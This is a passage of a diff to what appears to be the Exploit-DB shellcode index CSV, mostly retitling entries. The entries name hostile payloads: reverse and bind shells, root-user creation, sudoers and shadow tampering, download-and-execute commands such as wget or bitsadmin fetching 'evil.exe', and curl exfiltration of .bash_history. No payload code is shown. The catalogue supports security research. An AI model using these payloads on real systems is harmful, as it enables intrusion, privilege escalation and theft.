/etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 -43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 +43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 @@ -839,10 +839,10 @@ id,file,description,date,author,type,platform 43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64 43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64 -43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 -43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator -43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 -46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86 +43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 +43955,shellcodes/generator/43955.py,"Linux/x64 - execve(/bin/sh) + Custom Encoded XOR + Polymorphic Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator +43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 +46493,shellcodes/linux_x86/46493.c,"Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86 44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 @@ -873,7 +873,7 @@ id,file,description,date,author,type,platform 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86 -44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator +44445,shellcodes/generator/44445.py,"Linux/x64 - execve() Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator 44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 @@ -894,7 +894,7 @@ id,file,description,date,author,type,platform 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm 46491,shellcodes/linux_x86/46491.c,"Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm -44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86 +44963,shellcodes/linux_x86/44963.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86 45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64 @@ -905,44 +905,44 @@ id,file,description,date,author,type,platform 45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,shellcode,linux_mips 45290,shellcodes/arm/45290.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)",2018-08-29,"Ken Kitahara",shellcode,arm -45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 +45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64 -45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm -45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm +45308,shellcodes/arm/45308.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm +45329,shellcodes/arm/45329.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm 45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86 45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45417,shellcodes/linux_x86/45417.c,"Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45426,shellcodes/arm/45426.c,"Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm +45426,shellcodes/arm/45426.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm 45441,shellcodes/linux_x86/45441.c,"Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)",2018-09-20,"Valerio Brussani",shellcode,linux_x86 45458,shellcodes/arm/45458.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86 -45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips +45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 -45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 +45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 46039,shellcodes/linux_x86/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux_x86 -46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 -46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator +46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 +46123,shellcodes/generator/46123.py,"Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86 46275,shellcodes/linux_x86/46275.c,"Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes)",2019-01-29,"Daniele Votta",shellcode,linux_x86 46256,shellcodes/linux_x86/46256.c,"Linux/x86 - exit(0) Shellcode (5 bytes)",2019-01-28,"Daniele Votta",shellcode,linux_x86 46257,shellcodes/linux_x86/46257.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)",2019-01-28,"Joao Batista",shellcode,linux_x86 -46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm -46281,shellcodes/windows_x86/46281.c,"Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86 +46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm +46281,shellcodes/windows_x86/46281.c,"Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86 46264,shellcodes/arm/46264.s,"Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86 46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86 46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86 -46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos +46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46394,shellcodes/macos/46394.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46396,shellcodes/macos/46396.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos @@ -952,77 +952,77 @@ id,file,description,date,author,type,platform 46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator -46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86 +46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator -46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86 +46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86 46736,shellcodes/arm/46736.txt,"Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Encoder Shellcode (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator -46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)",2019-05-03,"Dave Sully",shellcode,generator +46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator)",2019-05-03,"Dave Sully",shellcode,generator 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator -46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86 +46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86 46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86 46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86 46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64 -46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64 +46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64 -46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86 +46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - execve(/bin/sh) + Reposition + INC Encoder Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86 47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64 47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64 47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86 -47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86 +47041,shellcodes/windows_x86/47041.c,"Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin + Execute Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86 47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86 -47043,shellcodes/linux_x86/47043.c,"Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86 +47043,shellcodes/linux_x86/47043.c,"Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86 47048,shellcodes/arm/47048.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47049,shellcodes/arm/47049.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47050,shellcodes/arm/47050.c,"Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47051,shellcodes/arm/47051.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm -47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm +47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47053,shellcodes/arm/47053.c,"Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47054,shellcodes/arm/47054.c,"Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm -47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm -47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm +47055,shellcodes/arm/47055.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm +47056,shellcodes/arm/47056.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm -47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 +47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64 -47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64 -47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 -47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 +47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64 +47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 +47201,shellcodes/linux_x86/47201.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) 